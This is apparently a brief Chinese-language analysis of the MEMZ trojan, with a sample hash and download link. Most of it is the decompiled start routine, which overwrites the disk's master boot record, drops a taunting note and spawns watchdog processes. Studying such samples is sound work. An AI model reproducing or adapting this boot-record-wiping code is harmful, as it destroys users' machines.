一、概述

作者:longaotian

时间:2022-5-31

样本来源:https://bbs.pediy.com/

下载:https://1drv.ms/u/s!ArU76A-w0YNK7SKw-ShnZUxHeud0?e=ZLcn2b

MD5:19dbec50735b5f2a72d4199c4e184960

本文档讲述关于彩虹猫病毒的行为、技术细节

二、正文

之前写过没找到,待定,没有对抗主要的点就是复写MBR

void __noreturn start()
{
  const WCHAR *CommandLineW; // eax
  LPWSTR *v1; // eax
  HANDLE FileA; // ebx
  unsigned int v3; // edi
  _BYTE *v4; // esi
  _BYTE *v5; // ecx
  unsigned int i; // ecx
  HANDLE v7; // esi
  unsigned int v8; // edi
  DWORD *v9; // esi
  WCHAR *v10; // esi
  int v11; // edi
  SHELLEXECUTEINFOW pExecInfo; // [esp+Ch] [ebp-64h] BYREF
  MSG Msg; // [esp+48h] [ebp-28h] BYREF
  DWORD NumberOfBytesWritten; // [esp+64h] [ebp-Ch] BYREF
  HANDLE hObject; // [esp+68h] [ebp-8h]
  int pNumArgs; // [esp+6Ch] [ebp-4h] BYREF

  dword_405184 = GetSystemMetrics(0);
  dword_405188 = GetSystemMetrics(1);
  CommandLineW = GetCommandLineW();
  v1 = CommandLineToArgvW(CommandLineW, &pNumArgs);
  if ( pNumArgs > 1 )
  {
    if ( !lstrcmpW(v1[1], L"/watchdog") )
    {
      CreateThread(0, 0, sub_40114A, 0, 0, 0);
      pExecInfo.lpVerb = (LPCWSTR)48;
      pExecInfo.lpParameters = (LPCWSTR)sub_401000;
      pExecInfo.hIcon = (HANDLE)"hax";
      pExecInfo.lpFile = 0;
      memset(&pExecInfo.lpDirectory, 0, 28);
      pExecInfo.hProcess = 0;
      RegisterClassExA((const WNDCLASSEXA *)&pExecInfo.lpVerb);
      CreateWindowExA(0, "hax", 0, 0, 0, 0, 100, 100, 0, 0, 0, 0);
      while ( GetMessageW(&Msg, 0, 0, 0) > 0 )
      {
        TranslateMessage(&Msg);
        DispatchMessageW(&Msg);
      }
    }
    FileA = CreateFileA("\\\\.\\PhysicalDrive0", 0xC0000000, 3u, 0, 3u, 0, 0);
    hObject = FileA;
    if ( FileA == (HANDLE)-1 )
      ExitProcess(2u);
    v3 = 0;
    v4 = LocalAlloc(0x40u, 0x10000u);
    v5 = v4;
    do
    {
      ++v3;
      *v5 = v5[byte_402118 - v4];
      ++v5;
    }
    while ( v3 < 0x12F );
    for ( i = 0; i < 0x7A0; ++i )
      v4[i + 510] = byte_402248[i];
    if ( !WriteFile(FileA, v4, 0x10000u, &NumberOfBytesWritten, 0) )
      ExitProcess(3u);
    CloseHandle(hObject);
    v7 = CreateFileA("\\note.txt", 0xC0000000, 3u, 0, 2u, 0x80u, 0);
    if ( v7 == (HANDLE)-1 )
      ExitProcess(4u);
    if ( !WriteFile(
            v7,
            "YOUR COMPUTER HAS BEEN FUCKED BY THE MEMZ TROJAN.\r\n"
            "\r\n"
            "Your computer won't boot up again,\r\n"
            "so use it as long as you can!\r\n"
            "\r\n"
            ":D\r\n"
            "\r\n"
            "Trying to kill MEMZ will cause your system to be\r\n"
            "destroyed instantly, so don't try it :D",
            0xDAu,
            &NumberOfBytesWritten,
            0) )
      ExitProcess(5u);
    CloseHandle(v7);
    ShellExecuteA(0, 0, "notepad", "\\note.txt", 0, 10);
    v8 = 0;
    v9 = (DWORD *)&off_405130;
    do
    {
      Sleep(v9[1]);
      CreateThread(0, 0, sub_401A2B, v9, 0, 0);
      ++v8;
      v9 += 2;
    }
    while ( v8 < 0xA );
    while ( 1 )
      Sleep(0x2710u);
  }
  if ( MessageBoxA(
         0,
         "The software you just executed is considered malware.\r\n"
         "This malware will harm your computer and makes it unusable.\r\n"
         "If you are seeing this message without knowing what you just executed, simply press No and nothing will happen."
         "\r\n"
         "If you know what this malware does and are using a safe environment to test, press Yes to start it.\r\n"
         "\r\n"
         "DO YOU WANT TO EXECUTE THIS MALWARE, RESULTING IN AN UNUSABLE MACHINE?",
         "MEMZ",
         0x34u) == 6
    && MessageBoxA(
         0,
         "THIS IS THE LAST WARNING!\r\n"
         "\r\n"
         "THE CREATOR IS NOT RESPONSIBLE FOR ANY DAMAGE MADE USING THIS MALWARE!\r\n"
         "STILL EXECUTE IT?",
         "MEMZ",
         0x34u) == 6 )
  {
    v10 = (WCHAR *)LocalAlloc(0x40u, 0x4000u);
    GetModuleFileNameW(0, v10, 0x2000u);
    v11 = 5;
    do
    {
      ShellExecuteW(0, 0, v10, L"/watchdog", 0, 10);
      --v11;
    }
    while ( v11 );
    pExecInfo.cbSize = 60;
    pExecInfo.lpFile = v10;
    pExecInfo.lpParameters = L"/main";
    pExecInfo.fMask = 64;
    pExecInfo.hwnd = 0;
    pExecInfo.lpVerb = 0;
    pExecInfo.lpDirectory = 0;
    pExecInfo.hInstApp = 0;
    pExecInfo.nShow = 10;
    ShellExecuteExW(&pExecInfo);
    SetPriorityClass(pExecInfo.hProcess, 0x80u);
  }
  ExitProcess(0);
}

I am very tired